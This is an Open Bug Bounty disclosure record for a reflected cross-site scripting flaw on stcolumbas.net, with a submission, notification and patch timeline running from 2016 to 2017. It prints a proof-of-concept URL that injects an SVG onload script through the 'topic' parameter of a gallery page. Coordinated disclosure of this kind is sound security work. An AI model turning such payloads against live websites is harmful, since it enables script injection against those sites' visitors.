stcolumbas.net XSS vulnerability

2016-11-30T06:02:00
ID OBB:195570
Type openbugbounty
Reporter HARSHJOSHI
Modified 2017-11-25T09:21:00

Description

Vulnerable URL:
http://stcolumbas.net/viewgallery3.jsp?topic=Feather%20in%20the%20cap%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&pby;=admin&msg;=1118091120151521354.txt&image1;=1118091120151521351.jpg&image2;=1118091120151521352.jpg&image3;=&image4;=&image5;=&image6;=&image7;=&image8;=&image9;=&image10;=&att;=
Details:

Description| Value
---|---
Patched:| Yes, at 25.11.2017
Latest check for patch:| 25.11.2017 09:21 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1749154
VIP website status:| No
Check stcolumbas.net SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 November, 2016 06:02 GMT
Generic security notifications sent to website owner| 30 November, 2016 06:04 GMT
Vulnerability details disclosed by researcher| 28 December, 2016 06:13 GMT
Vulnerability patched by the website owner| 25 November, 2017 09:21 GMT